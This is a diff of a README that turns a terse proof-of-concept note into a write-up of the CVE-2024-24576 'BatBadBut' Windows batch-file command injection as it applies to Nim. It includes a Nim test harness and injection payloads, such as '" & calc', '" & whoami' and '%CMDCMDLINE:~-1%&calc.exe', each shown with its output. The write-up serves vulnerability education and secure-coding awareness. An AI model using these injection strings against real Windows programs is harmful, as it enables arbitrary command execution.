1 | | - | # CVE-2024-24576-PoC for Nim Lang |
2 | | - | This is a POC for nim lang to apply the `BatBadBut` command injection vulnerability in Windows where attackers can inject commands via batch files due to the way the CreateProcess function and cmd.exe parsing rules interact. |
| 1 | + | **Exploring Command Injection Vulnerabilities in Windows with Nim** |
| 2 | + | |
| 3 | + | In light of the recent discovery outlined in Flatt Security Research's article, the `BatBadBut` vulnerability (CVE-2024-24576) presents a critical concern for Windows' command execution security. A practical investigation using Nim programming language offers insight into how attackers might exploit this vulnerability. |
| 4 | + | |
| 5 | + | Nim, known for its efficiency and expressiveness, isn't immune to the subtle intricacies of command execution on Windows. By experimenting with a simple Nim script designed to execute a `test.bat` file with varying inputs, we uncover the nuances of command injection vulnerability. |
| 6 | + | |
| 7 | + | ### The Experiment |
| 8 | + | |
| 9 | + | The Nim script executes the batch file in three distinct manners: |
| 10 | + | - Without quoting the shell input. |
| 11 | + | - With quoting, using `quoteShell`. |
| 12 | + | - Direct shell command execution. |
| 13 | + | |
| 14 | + | ``` |
| 15 | + | import osproc, os |
| 16 | + | |
| 17 | + | block execProcess_NoQuoteShell: |
| 18 | + | echo "[*] execProcess NoQuoteShell" |
| 19 | + | echo "enter payload here" |
| 20 | + | |
| 21 | + | let input = readLine(stdin) |
| 22 | + | |
| 23 | + | let output = |
| 24 | + | execProcess("test.bat", args = @[input], options = {poUsePath, |
| 25 | + | poStdErrToStdOut}) |
| 26 | + | |
| 27 | + | echo "Output:\n", output |
| 28 | + | |
| 29 | + | block execProcess_QuoteShell: |
| 30 | + | echo "[*] execProcess QuoteShell" |
| 31 | + | echo "enter payload here" |
| 32 | + | |
| 33 | + | let input = readLine(stdin).quoteShell() |
| 34 | + | |
| 35 | + | let output = |
| 36 | + | execProcess("test.bat", args = @[input], options = {poUsePath, |
| 37 | + | poStdErrToStdOut}) |
3 | 38 | | |
4 | | - | ## Which nim versionis affected: |
5 | | - | All |
| 39 | + | echo "Output:\n", output |
6 | 40 | | |
7 | | - | ## How to test it: |
| 41 | + | block execShellCmd: |
| 42 | + | echo "[*] execShellCmd" |
| 43 | + | echo "enter payload here" |
| 44 | + | |
| 45 | + | let input = readLine(stdin) |
| 46 | + | |
| 47 | + | echo "Output:" |
| 48 | + | discard execShellCmd("test.bat " & input) |
| 49 | + | |
| 50 | + | ``` |
| 51 | + | |
| 52 | + | #### Test 1: Simple Payload |
8 | 53 | | |
9 | | - | Use the main.nim to test it like this: |
| 54 | + | A benign command, `nim &calc`, reveals differing behaviors: |
| 55 | + | - The unquoted execution passes the payload intact, echoing back without unintended consequences. |
| 56 | + | - Quoting via `quoteShell` results in misinterpretation, breaking the command. |
| 57 | + | - Direct execution surprisingly splits the input, inadvertently running `calc`. |
10 | 58 | | |
11 | | - | ## First test `Double Qoute Escape` |
12 | | - | 55" & calc |
13 | | - | 87" & whoami |
| 59 | + | ``` |
| 60 | + | [*] execProcess NoQuoteShell |
| 61 | + | enter payload here |
| 62 | + | nim &calc |
| 63 | + | Output: |
| 64 | + | Argument received: "nim &calc" # Excpaed correctly |
14 | 65 | | |
15 | | - | ## 2nd test |
| 66 | + | [*] execProcess QuoteShell |
| 67 | + | enter payload here |
| 68 | + | nim &calc |
| 69 | + | Output: |
| 70 | + | Argument received: "\"nim |
| 71 | + | 'calc\""' is not recognized as an internal or external command, |
| 72 | + | operable program or batch file. |
| 73 | + | |
| 74 | + | [*] execShellCmd |
| 75 | + | enter payload here |
| 76 | + | nim &calc |
| 77 | + | Output: |
| 78 | + | Argument received: nim # it run calc |
| 79 | + | ``` |
| 80 | + | |
| 81 | + | #### Test 2: Sophisticated Payload |
| 82 | + | |
| 83 | + | Using a more complex payload, `nim" &calc`, illustrate further discrepancies: |
| 84 | + | - Unquoted execution interprets the command in a risky manner, running `calc`. |
| 85 | + | - Quoted execution, this time, correctly escapes, showcasing the intended safety mechanism. |
| 86 | + | - Direct execution correctly handles the input but underscores potential risk areas. |
| 87 | + | |
| 88 | + | ``` |
| 89 | + | [*] execProcess NoQuoteShell |
| 90 | + | enter payload here |
| 91 | + | nim" &calc |
| 92 | + | Output: |
| 93 | + | Argument received: "nim\" #it run calc |
| 94 | + | |
| 95 | + | [*] execProcess QuoteShell |
| 96 | + | enter payload here |
| 97 | + | nim" &calc |
| 98 | + | Output: |
| 99 | + | Argument received: "\"nim\\\" &calc\"" #ecaped correctly |
| 100 | + | |
| 101 | + | [*] execShellCmd |
| 102 | + | enter payload here |
| 103 | + | nim" &calc |
| 104 | + | Output: |
| 105 | + | Argument received: nim" &calc # escaped correctly |
| 106 | + | ``` |
| 107 | + | |
| 108 | + | #### Test 3: Exploitative Payload |
| 109 | + | |
| 110 | + | An exploitative payload, designed to directly invoke `calc.exe`, unearths a consistent threat across all execution methods, demonstrating the ease of initiating unintended commands. |
| 111 | + | |
| 112 | + | ``` |
| 113 | + | [*] execProcess NoQuoteShell |
| 114 | + | enter payload here |
16 | 115 | | %CMDCMDLINE:~-1%&calc.exe |
| 116 | + | Output: |
| 117 | + | Argument received: e |
| 118 | + | |
| 119 | + | [*] execProcess QuoteShell |
| 120 | + | enter payload here |
| 121 | + | %CMDCMDLINE:~-1%&calc.exe |
| 122 | + | Output: |
| 123 | + | Argument received: e |
| 124 | + | |
| 125 | + | [*] execShellCmd |
| 126 | + | enter payload here |
| 127 | + | %CMDCMDLINE:~-1%&calc.exe |
| 128 | + | Output: |
| 129 | + | Argument received: e |
| 130 | + | ``` |
| 131 | + | |
| 132 | + | ### Conclusion |
| 133 | + | |
| 134 | + | This exploration underscores the critical need for vigilance and proper input handling in programming languages running on Windows. While Nim provides mechanisms to mitigate injection attacks, the effectiveness heavily relies on the developer's awareness and application of security best practices. The `BatBadBut` vulnerability serves as a stark reminder of the ever-present risks in software development and the importance of continuous learning and adaptation. |
| 135 | + | |
| 136 | + | For developers, this experiment highlights the importance of sanitizing input and carefully considering the execution context of external commands. The detailed research and PoC can further guide and inform secure coding practices, available at the following links: |
| 137 | + | - CVE-2024-24576 PoC on GitHub: [https://github.com/frostb1ten/CVE-2024-24576-PoC](https://github.com/frostb1ten/CVE-2024-24576-PoC) |
| 138 | + | - Flatt Security Research article: [https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/](https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/) |
17 | 139 | | |